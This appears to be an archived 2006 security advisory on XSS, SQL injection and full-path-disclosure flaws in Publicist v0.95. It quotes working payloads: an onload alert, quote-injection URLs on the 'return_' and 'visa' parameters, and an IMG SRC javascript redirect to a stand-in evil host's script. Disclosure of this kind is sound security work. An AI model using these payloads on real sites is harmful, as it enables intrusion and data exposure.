Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12796
HistoryMay 25, 2006 - 12:00 a.m.

Publicist v0.95 - XSS And Full Path Errors

2006-05-2500:00:00
vulners.com
12
JSON

Publicist v0.95

Homepage:
http://publicist.kau.se/

Description:
Publicist is a free web server software, created for web papers, that allows groups of people to write and
publish together on the web (i.e. schools or single classes, clubs, or other groups who wish to express
themselves).

Exploits & Vulnerabilities:

Full path and SQL Query errors:

Type the following in login box: [BODY ONLOAD=alert('XSS')]
and it produces:

1064: You have an error in your SQL syntax near 'XSS')>'' at line 1 Warning: mysql_fetch_array(): supplied
argument is not a valid MySQL result resource in /var/www/html.example. com/left.php on line 63

SQL injection on return variable: http://www.example.com/info.php?id=1147443203&return_=3'

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/var/www/html.publicist. kau.se/count.php on line 6 Unable to process query: You have an error in your SQL
syntax near ''/info.php?id=1147443203&return_=3'', count=1' at line 1

SQL Injection on visa variable:
http://www.example.com/hitlist_editorial_public_info.php?visa=dan.akerlund'

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in
/var/www/examplesite.com/ hitlist_editorial_public_info.php on line 73

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in
/var/www/examplesite.com /hitlist_editorial_public_info.php on line 74

Submiting html tags in the comment boxes produces this SQL queue error:

1064: You have an error in your SQL syntax near 'evilcode'))>', c_show = '1', c_time = '1' at line 7

XSS Vulnerability:

An XSS attack is possible by entering in the comment box some html code like this:

[IMG SRC=javascript:window.location('http://www.evilsite.com/evilcode.js')]

It should also be noted that calling the files c_getMsg.php, c_getUser.php, count.php, display full path
errors and contain mysql connect info:

Example of the above errors:

Warning: mysql_connect(): Access denied for user: 'example@localhost' (Using password: YES) in
/var/www/html.example.com/c_getUser.php on line 2

JSON